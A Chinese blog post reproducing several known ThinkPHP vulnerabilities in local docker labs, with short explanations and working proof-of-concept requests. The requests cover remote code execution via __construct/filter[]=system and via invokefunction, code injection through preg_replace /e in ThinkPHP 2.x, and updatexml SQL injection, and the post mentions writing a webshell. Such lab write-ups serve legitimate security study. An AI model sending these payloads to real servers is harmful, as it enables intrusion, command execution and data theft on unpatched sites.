thinkphp 框架漏洞复现

2022/4/23 12:42:36

本文主要是介绍thinkphp 框架漏洞复现,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

ThinkPHP5 5.0.23 远程代码执行漏洞

漏洞搭建

docker-compose up -d

漏洞介绍

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞复现

  • poc

    POST /index.php?s=captcha HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: settingStore=1630480512401_0
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
    
  • 漏洞复习
    image

  • 写shell,利用pwd出来的路径写入shell
    image

ThinkPHP 2.x 任意代码执行漏洞

漏洞介绍

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

环境搭建

执行如下命令启动ThinkPHP 2.1的Demo应用:

docker-compose up -d

漏洞复现

  • poc
    http://127.0.0.1:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
  • 复现
    image

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

参考链接:

  • http://www.thinkphp.cn/topic/60400.html
  • http://www.thinkphp.cn/topic/60390.html
  • https://xz.aliyun.com/t/3570

漏洞环境

运行ThinkPHP 5.0.20版本:

docker-compose up -d

漏洞复现

  • poc
    http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
  • 复现
    image

ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

运行环境:

docker-compose up -d

漏洞原理

漏洞原理说明:

  • https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
  • https://xz.aliyun.com/t/125

漏洞利用

  • poc
    127.0.0.1/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
  • 复现
    image
  • 信息泄漏
    image


这篇关于thinkphp 框架漏洞复现的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程